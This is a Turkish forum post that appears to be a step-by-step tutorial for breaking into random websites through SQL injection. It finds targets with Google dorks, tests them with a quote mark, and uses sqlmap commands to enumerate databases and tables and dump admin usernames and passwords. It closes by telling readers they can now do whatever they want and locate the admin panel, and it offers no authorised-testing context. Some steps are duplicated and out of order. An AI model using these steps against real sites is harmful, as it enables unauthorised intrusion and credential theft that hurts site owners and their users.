ADIM 1 : Terminal'i açın.
ADIM 2: Açıklı bir site bulmak için tarayıcıya dork yazın. Örnek : "php?id=13" siz php nin yanına ingilizce kelime türeterek de yazabilirsiniz. Örnek : inurl: "war.php?id=" veya inurl: "article.php?id="
ADIM 3: Açıklı bir site bulduktan sonra sonuna ' işareti ekleyin ve sitede mysql hatası veriyorsa sql açığı vardır.
ADIM 4: Tekrardan terminale geçin ve aşağıdaki kodu terminale yazın. Bu kod sitedeki databaseleri bulmamıza yardımcı olucak.
ADIM 5: Kullanılabilir databaseleri gördük, bunlardan information_schema databasesi haricindeki diğer databaseleri kullanıcaz.
ADIM 6: Databasemizi seçip tablolarını çıkarmak için aşağıdaki kodumuzu terminale geçireceğiz.
ADIM 7: Databasemizi seçip tablolarını çıkarmak için aşağıdaki kodumuzu terminale geçireceğiz.
Kod:
sqlmap -u açıklı site --dbs
Kod:
Gelen [y/N] sorularına y yazarak enterliyoruz.
ADIM 6: Databasemizi seçip tablolarını çıkarmak için aşağıdaki kodumuzu terminale geçireceğiz.
Kod:
sqlmap -u açıklısite -D database adı --table
Kod:
sqlmap -u açıklısite -D database adı --table
ADIM 8: Gördüğünüz gibi tablolar önümüze geldi ve 25 tane tablo buldu. Burda bizim yöneleceğimiz tablo "admin,user,superadmin" gibi tablolar olacak. Bu sitede "admin" tablosu olduğu için ben admin tablosunu kullanacağım. Aşağıdaki koddan tablo seçiyoruz ve columnlarını buluyoruz.
Kod:
sqlmap -u açıklısite -D database adı -T admin --column
ADIM 9: Colunumları gördük bunlar : id,identifiant,nom ve password. Şimdi bunları göstermeye gelelim ( admin şifresi idsi adı vs.) Kodu aşağıdaki gibi yazın.
Kod:
sqlmap -u açıklısite -D database -T admin -C colunmlar --dump
ADIM 10: Gördüğünüz gibi admin bilgileri artık sizin elinizde, artık istediğinizi yapabilirsiniz. Admin panelini bulmayıda artık siz yapabilirsiniz.
Evet bu konumuzdan da bukadardı. Umarım işinize yaramıştır. Anlatan: Burak Walker, resimler de bana aittir. Eğer bir sorununuz olursa altta belirtin ve "teşekkür" butonunu kullanmayı esirgemeyin. Konumu okuduğunuz için teşekkürler. İyi forumlar...





